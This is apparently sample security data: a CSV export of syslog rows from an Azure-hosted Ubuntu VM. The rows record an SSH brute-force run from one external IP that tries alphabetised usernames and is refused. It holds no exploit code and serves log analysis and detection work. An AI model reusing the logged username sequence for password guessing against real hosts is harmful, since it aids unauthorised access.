+2511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:43,UbuntuDevEnv,2019-06-28 05:15:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:45,UbuntuDevEnv,2019-06-28 05:15:45,auth,UbuntuDevEnv,info,Failed password for invalid user apache from 193.201.224.232 port 51822 ssh2,93285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,193.201.224.2,51822,,
+2513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:45,UbuntuDevEnv,2019-06-28 05:15:45,auth,UbuntuDevEnv,info,"Disconnecting invalid user apache 193.201.224.232 port 51822: Change of username or service not allowed: (apache,ssh-connection) -> (api,ssh-connection) [preauth]",93285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,193.201.224.2,51822,,
+2514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:46,UbuntuDevEnv,2019-06-28 05:15:45,auth,UbuntuDevEnv,info,Invalid user api from 193.201.224.232 port 54789,93298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,api,193.201.224.2,54789,,
+2515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:46,UbuntuDevEnv,2019-06-28 05:15:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:46,UbuntuDevEnv,2019-06-28 05:15:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:48,UbuntuDevEnv,2019-06-28 05:15:48,auth,UbuntuDevEnv,info,Failed password for invalid user api from 193.201.224.232 port 54789 ssh2,93298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,api,193.201.224.2,54789,,
+2518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:48,UbuntuDevEnv,2019-06-28 05:15:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user api 193.201.224.232 port 54789: Change of username or service not allowed: (api,ssh-connection) -> (backup,ssh-connection) [preauth]",93298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,api,193.201.224.2,54789,,
+2519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:51,UbuntuDevEnv,2019-06-28 05:15:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=backup,93311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,193.201.224.2,,0,
+2520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:53,UbuntuDevEnv,2019-06-28 05:15:53,auth,UbuntuDevEnv,info,Failed password for backup from 193.201.224.232 port 58711 ssh2,93311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,58711,,
+2521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:56,UbuntuDevEnv,2019-06-28 05:15:55,auth,UbuntuDevEnv,info,"Disconnecting authenticating user backup 193.201.224.232 port 58711: Change of username or service not allowed: (backup,ssh-connection) -> (bill,ssh-connection) [preauth]",93311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,193.201.224.2,58711,,
+2522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:56,UbuntuDevEnv,2019-06-28 05:15:55,auth,UbuntuDevEnv,info,Failed password for backup from 193.201.224.232 port 58711 ssh2,93311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,58711,,
+2523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:56,UbuntuDevEnv,2019-06-28 05:15:55,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=backup,93311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,193.201.224.2,,0,
+2524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:57,UbuntuDevEnv,2019-06-28 05:15:56,auth,UbuntuDevEnv,info,Invalid user bill from 193.201.224.232 port 25424,93337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bill,193.201.224.2,25424,,
+2525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:57,UbuntuDevEnv,2019-06-28 05:15:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:57,UbuntuDevEnv,2019-06-28 05:15:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:59,UbuntuDevEnv,2019-06-28 05:15:58,auth,UbuntuDevEnv,info,Failed password for invalid user bill from 193.201.224.232 port 25424 ssh2,93337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bill,193.201.224.2,25424,,
+2528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:00,UbuntuDevEnv,2019-06-28 05:16:00,auth,UbuntuDevEnv,info,"Disconnecting invalid user bill 193.201.224.232 port 25424: Change of username or service not allowed: (bill,ssh-connection) -> (bob,ssh-connection) [preauth]",93337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bill,193.201.224.2,25424,,
+2529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:04,UbuntuDevEnv,2019-06-28 05:16:03,auth,UbuntuDevEnv,info,Invalid user bob from 193.201.224.232 port 35681,93366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bob,193.201.224.2,35681,,
+2530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:04,UbuntuDevEnv,2019-06-28 05:16:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:04,UbuntuDevEnv,2019-06-28 05:16:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:06,UbuntuDevEnv,2019-06-28 05:16:05,auth,UbuntuDevEnv,info,Failed password for invalid user bob from 193.201.224.232 port 35681 ssh2,93366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bob,193.201.224.2,35681,,
+2533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:06,UbuntuDevEnv,2019-06-28 05:16:05,auth,UbuntuDevEnv,info,"Disconnecting invalid user bob 193.201.224.232 port 35681: Change of username or service not allowed: (bob,ssh-connection) -> (Cisco,ssh-connection) [preauth]",93366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bob,193.201.224.2,35681,,
+2534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:07,UbuntuDevEnv,2019-06-28 05:16:06,auth,UbuntuDevEnv,info,Invalid user Cisco from 193.201.224.232 port 38802,93380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Cisco,193.201.224.2,38802,,
+2535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:07,UbuntuDevEnv,2019-06-28 05:16:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:07,UbuntuDevEnv,2019-06-28 05:16:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:09,UbuntuDevEnv,2019-06-28 05:16:09,auth,UbuntuDevEnv,info,Failed password for invalid user Cisco from 193.201.224.232 port 38802 ssh2,93380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Cisco,193.201.224.2,38802,,
+2538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:09,UbuntuDevEnv,2019-06-28 05:16:09,auth,UbuntuDevEnv,info,"Disconnecting invalid user Cisco 193.201.224.232 port 38802: Change of username or service not allowed: (Cisco,ssh-connection) -> (client,ssh-connection) [preauth]",93380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Cisco,193.201.224.2,38802,,
+2539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:17,UbuntuDevEnv,2019-06-28 05:16:17,auth,UbuntuDevEnv,info,Invalid user client from 193.201.224.232 port 42647,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:17,UbuntuDevEnv,2019-06-28 05:16:17,auth,UbuntuDevEnv,info,Failed none for invalid user client from 193.201.224.232 port 42647 ssh2,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:18,UbuntuDevEnv,2019-06-28 05:16:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:18,UbuntuDevEnv,2019-06-28 05:16:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:20,UbuntuDevEnv,2019-06-28 05:16:19,auth,UbuntuDevEnv,info,Failed password for invalid user client from 193.201.224.232 port 42647 ssh2,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:21,UbuntuDevEnv,2019-06-28 05:16:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:23,UbuntuDevEnv,2019-06-28 05:16:23,auth,UbuntuDevEnv,info,Failed password for invalid user client from 193.201.224.232 port 42647 ssh2,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:23,UbuntuDevEnv,2019-06-28 05:16:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:25,UbuntuDevEnv,2019-06-28 05:16:25,auth,UbuntuDevEnv,info,Failed password for invalid user client from 193.201.224.232 port 42647 ssh2,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:26,UbuntuDevEnv,2019-06-28 05:16:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:28,UbuntuDevEnv,2019-06-28 05:16:27,auth,UbuntuDevEnv,info,Failed password for invalid user client from 193.201.224.232 port 42647 ssh2,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:28,UbuntuDevEnv,2019-06-28 05:16:28,auth,UbuntuDevEnv,info,"Disconnecting invalid user client 193.201.224.232 port 42647: Change of username or service not allowed: (client,ssh-connection) -> (daemon,ssh-connection) [preauth]",93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client,193.201.224.2,42647,,
+2551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:28,UbuntuDevEnv,2019-06-28 05:16:28,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:28,UbuntuDevEnv,2019-06-28 05:16:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,93393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:32,UbuntuDevEnv,2019-06-28 05:16:32,auth,UbuntuDevEnv,info,"Disconnecting authenticating user daemon 193.201.224.232 port 50369: Change of username or service not allowed: (daemon,ssh-connection) -> (daniel,ssh-connection) [preauth]",93461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,daemon,193.201.224.2,50369,,
+2554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:34,UbuntuDevEnv,2019-06-28 05:16:33,auth,UbuntuDevEnv,info,Invalid user daniel from 193.201.224.232 port 54611,93481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,193.201.224.2,54611,,
+2555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:34,UbuntuDevEnv,2019-06-28 05:16:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:34,UbuntuDevEnv,2019-06-28 05:16:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:36,UbuntuDevEnv,2019-06-28 05:16:35,auth,UbuntuDevEnv,info,Failed password for invalid user daniel from 193.201.224.232 port 54611 ssh2,93481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,193.201.224.2,54611,,
+2558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:37,UbuntuDevEnv,2019-06-28 05:16:36,auth,UbuntuDevEnv,info,"Disconnecting invalid user daniel 193.201.224.232 port 54611: Change of username or service not allowed: (daniel,ssh-connection) -> (david,ssh-connection) [preauth]",93481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,193.201.224.2,54611,,
+2559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:37,UbuntuDevEnv,2019-06-28 05:16:37,auth,UbuntuDevEnv,info,Invalid user david from 193.201.224.232 port 58359,93496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,193.201.224.2,58359,,
+2560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:37,UbuntuDevEnv,2019-06-28 05:16:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:37,UbuntuDevEnv,2019-06-28 05:16:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:39,UbuntuDevEnv,2019-06-28 05:16:39,auth,UbuntuDevEnv,info,Failed password for invalid user david from 193.201.224.232 port 58359 ssh2,93496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,193.201.224.2,58359,,
+2563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:39,UbuntuDevEnv,2019-06-28 05:16:39,auth,UbuntuDevEnv,info,"Disconnecting invalid user david 193.201.224.232 port 58359: Change of username or service not allowed: (david,ssh-connection) -> (demo,ssh-connection) [preauth]",93496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,193.201.224.2,58359,,
+2564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:45,UbuntuDevEnv,2019-06-28 05:16:45,auth,UbuntuDevEnv,info,Invalid user demo from 193.201.224.232 port 61379,93509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,193.201.224.2,61379,,
+2565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:46,UbuntuDevEnv,2019-06-28 05:16:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:46,UbuntuDevEnv,2019-06-28 05:16:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:48,UbuntuDevEnv,2019-06-28 05:16:47,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 193.201.224.232 port 61379 ssh2,93509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,193.201.224.2,61379,,
+2568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:48,UbuntuDevEnv,2019-06-28 05:16:47,auth,UbuntuDevEnv,info,"Disconnecting invalid user demo 193.201.224.232 port 61379: Change of username or service not allowed: (demo,ssh-connection) -> (diag,ssh-connection) [preauth]",93509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,193.201.224.2,61379,,
